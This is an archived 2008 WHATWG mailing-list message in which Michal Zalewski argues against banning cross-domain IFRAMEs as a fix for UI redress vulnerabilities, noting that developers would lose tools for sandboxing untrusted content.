[whatwg] Dealing with UI redress vulnerabilities inherent to the current web

Michal Zalewski lcamtuf at dione.cc
Fri Sep 26 09:43:41 PDT 2008


On Fri, 26 Sep 2008, Elliotte Harold wrote:

> Absolutely false. The media simply needs to be served from the same host 
> the blog itself is. This is how almost all the media in my blogs works 
> today. What little content comes from a 3rd party site in my blogs 
> (mostly from laziness) could easily be moved to the sites that serve the 
> blogs.

I kinda assumed this suggestion was tongue-in-cheek, but if not - banning 
cross-domain IFRAMEs to fix one flaw, without providing viable methods for 
sandboxing untrusted same-origin content, would leave web developers with 
no tools to deal with quite a few classes of major security issues.

/mz



More information about the whatwg mailing list